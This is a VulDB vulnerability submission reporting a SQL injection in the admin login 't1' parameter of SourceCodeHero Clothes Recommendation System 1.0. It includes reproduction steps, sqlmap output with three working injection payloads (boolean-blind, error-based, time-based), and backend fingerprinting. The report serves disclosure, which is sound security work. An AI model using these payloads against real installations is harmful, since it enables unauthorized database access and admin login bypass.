| 제목 | SourceCodeHero Clothes Recommendation System - Admin Login Page V1.0 SQL Injection |
|---|
| 설명 | would like to report a SQL injection vulnerability I discovered in SourceCodeHero - Clothes Recommendation System during my testing.
Details:
Affected URL/Endpoint: /Online_Shopping/admin/index.php
Vulnerable Parameter: 't1'
Risk Level: High (allows malicious users to execute arbitrary SQL queries)
Steps to reproduce:
1) Navigate to the API /Online_Shopping/admin/index.php
2) Fill up username and password
3) Use a proxy like burpsuite to intercept the request.
4) Input the payload to invoke the SQL injection.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: t1 (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: t1=admin' AND 3416=(SELECT (CASE WHEN (3416=3416) THEN 3416 ELSE (SELECT 7431 UNION SELECT 1974) END))-- -&p1=priya123sdf&sub=Login
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: t1=admin' AND GTID_SUBSET(CONCAT(0x716a7a7071,(SELECT (ELT(6564=6564,1))),0x717a786a71),6564)-- IiwT&p1=priya123sdf&sub=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: t1=admin' AND (SELECT 4899 FROM (SELECT(SLEEP(5)))qPxA)-- KZMD&p1=priya123sdf&sub=Login
---
[13:11:11] [INFO] the back-end DBMS is MySQL
[13:11:11] [INFO] fetching banner
[13:11:11] [INFO] resumed: '8.3.0'
web application technology: PHP 8.2.18, Apache 2.4.59
back-end DBMS: MySQL >= 5.6
banner: '8.3.0'
Please let me know if you need further information or a more detailed analysis. |
|---|
| 사용자 | Delvy (UID 74555) |
|---|
| 제출 | 2024. 10. 21. AM 07:12 (2 연령 ago) |
|---|
| 모더레이션 | 2024. 10. 24. PM 12:48 (3 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 281681 [SourceCodeHero Clothes Recommendation System 1.0 Admin Login Page /admin/index.php t1 SQL 주입] |
|---|
| 포인트들 | 17 |
|---|